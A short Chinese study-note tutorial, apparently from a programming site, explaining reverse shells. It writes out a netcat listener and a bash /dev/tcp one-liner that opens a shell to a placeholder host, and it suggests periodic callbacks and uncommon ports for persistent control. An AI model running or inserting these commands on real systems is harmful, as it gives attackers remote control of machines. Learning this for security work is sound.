Java教程

反弹shell

本文主要是介绍反弹shell,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!

反弹shell

学习笔记
反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发器请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。
持久化控制,通过每隔一段时间执行反弹shell即可获取持久化控制。
端口使用不固定。(尽量找一些不常用的端口。)

nc -lnvp 12345      #服务端开启监听12345端口
bash -i >& /dev/tcp/x.x.x.x/12345 0>&1 #客户端向x.x.x.x建立交互连接

-i: 产生交互式的shell
/dev/tcp/: linux中一切皆文件
>&: 混合输出
服务器:
在这里插入图片描述
客户端:
在这里插入图片描述
服务端:
在这里插入图片描述

这篇关于反弹shell的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!